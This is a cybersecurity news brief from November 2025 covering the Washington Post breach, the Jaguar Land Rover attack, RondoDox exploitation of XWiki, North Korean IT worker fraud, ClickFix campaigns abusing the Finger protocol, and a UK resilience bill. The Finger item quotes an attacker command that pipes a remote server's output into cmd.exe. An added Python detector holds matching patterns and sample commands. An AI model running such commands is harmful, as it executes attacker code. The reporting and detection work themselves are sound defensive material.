Svoboda Cybersecurity Brief November 16, 2025
Washington Post Data Breach Exposes Sensitive Employee Data
A cyberattack on The Washington Post compromised personal data of 9,720 employees and contractors, including Social Security numbers, bank account details, and tax IDs. The breach occurred between July 10 and August 22, 2025, exploiting a previously unknown vulnerability in Oracle E-Business Suite. High-profile individuals like former national security advisor John Bolton were affected.
Impact: Significant financial and identity theft risks for victims.
Mitigation: Oracle has patched the vulnerability; affected individuals should monitor financial accounts and enable credit freezes.
Source: DataBreaches.net
Jaguar Land Rover Cyberattack Costs $220 Million
A September 2025 cyberattack by Scattered Lapsus$ Hunters disrupted production at Jaguar Land Rover (JLR), leading to a $220 million loss and forcing UK government intervention with a £1.5 billion loan. Data was stolen, and production resumed October 8 after weeks of shutdowns.
Source: BleepingComputer
RondoDox Botnet Exploits Unpatched XWiki Servers
The RondoDox botnet is actively exploiting CVE-2025-24893, a critical eval injection flaw in XWiki (patched in versions 15.10.11, 16.4.1, and 16.5.0RC1), to enslave devices for DDoS attacks. Exploitation surged in November 2025, with the same flaw also being used to drop cryptocurrency miners and open reverse shells.
Impact: Unpatched servers risk arbitrary code execution and botnet enrollment.
Mitigation: Update XWiki to patched versions; block unauthorized access to /bin/get/Main/SolrSearch.
Source: The Hacker News
North Korean IT Worker Fraud Ring Uncovered
Five U.S. citizens pleaded guilty to facilitating North Korean IT workers in infiltrating 136 U.S. companies, earning over $2.2 million for the regime. The scheme involved identity theft, laptop farms, and remote desktop software to bypass employment checks.
Source: The Hacker News
Finger Protocol Abused in ClickFix Malware Campaigns
Threat actors are abusing the legacy Finger protocol (TCP port 79) to deliver malware via commands like finger vke@finger.cloudmega[.]org | cmd, where the text returned by the attacker-controlled Finger server is piped straight into cmd.exe and executed. The campaigns deploy infostealers or the NetSupport Manager RAT and evade detection by routing the payload through cmd.exe rather than a conventional download.
Impact: Remote code execution and persistent RAT infections.
Mitigation: Block outgoing TCP port 79; educate users on social engineering tactics.
Source: BleepingComputer
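As an added defender-side example (not from the brief or its sources), the following Python triage routine flags the two signals this item describes, a command line that pipes Finger output into a shell and an outbound TCP/79 flow, and correlates them per host over constructed sample telemetry. All hostnames, addresses and event field names are assumptions.

```python
import re

# Constructed sample telemetry (not taken from the brief): Windows process-creation
# records and outbound network-flow records, normalised into flat dicts.
SAMPLE_EVENTS = [
    {"kind": "proc", "host": "ws01", "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "cmd.exe /c finger vke@finger.example.invalid | cmd"},
    {"kind": "proc", "host": "ws02", "image": r"C:\Windows\System32\finger.exe",
     "cmdline": "finger alice@intranet.example.invalid"},
    {"kind": "proc", "host": "ws04", "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "cmd.exe /c dir"},
    {"kind": "net", "host": "ws01", "dst": "203.0.113.10", "dport": 79, "dir": "out"},
    {"kind": "net", "host": "ws03", "dst": "192.0.2.20", "dport": 443, "dir": "out"},
]

# finger(.exe) followed later on the same command line by a pipe into a shell.
FINGER_PIPED_TO_SHELL = re.compile(
    r"\bfinger(?:\.exe)?\b[^|]*\|\s*(?:cmd|powershell|pwsh)(?:\.exe)?\b",
    re.IGNORECASE,
)

def detect_finger_abuse(events: list[dict]) -> list[dict]:
    """Return one alert per matching event, in arrival order."""
    alerts = []
    for ev in events:
        if ev["kind"] == "proc":
            if FINGER_PIPED_TO_SHELL.search(ev["cmdline"]):
                # The ClickFix pattern: whatever the Finger server returns gets executed.
                alerts.append({"host": ev["host"], "severity": "high",
                               "rule": "finger_output_piped_to_shell", "detail": ev["cmdline"]})
            elif ev["image"].lower().endswith("\\finger.exe"):
                # Bare finger.exe use is rare on modern hosts; low-severity, worth a look.
                alerts.append({"host": ev["host"], "severity": "low",
                               "rule": "finger_client_executed", "detail": ev["cmdline"]})
        elif ev["kind"] == "net" and ev["dir"] == "out" and ev["dport"] == 79:
            # Outbound TCP/79 is exactly what the brief's mitigation says to block.
            alerts.append({"host": ev["host"], "severity": "medium",
                           "rule": "outbound_finger_tcp79", "detail": ev["dst"]})
    return alerts

def hosts_with_both_signals(alerts: list[dict]) -> set[str]:
    """Hosts showing both the piped command line and an outbound TCP/79 flow."""
    by_host: dict[str, set[str]] = {}
    for a in alerts:
        by_host.setdefault(a["host"], set()).add(a["rule"])
    return {h for h, rules in by_host.items()
            if {"finger_output_piped_to_shell", "outbound_finger_tcp79"} <= rules}

if __name__ == "__main__":
    found = detect_finger_abuse(SAMPLE_EVENTS)
    for a in found:
        print(f"{a['severity']:6} {a['host']} {a['rule']}: {a['detail']}")
    print("correlated:", hosts_with_both_signals(found))  # {'ws01'}
```

Legitimate internal Finger use, if any, should be allow-listed by destination before the TCP/79 rule is enforced as a block.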
UK Introduces Cyber Security and Resilience Bill
The UK government proposed a bill expanding the NIS Regulations 2018 to include medium/large data centers, managed IT providers, and critical suppliers. Requirements include incident reporting and stricter security standards, aligning with the EU’s NIS2 Directive.
Source: DataBreaches.net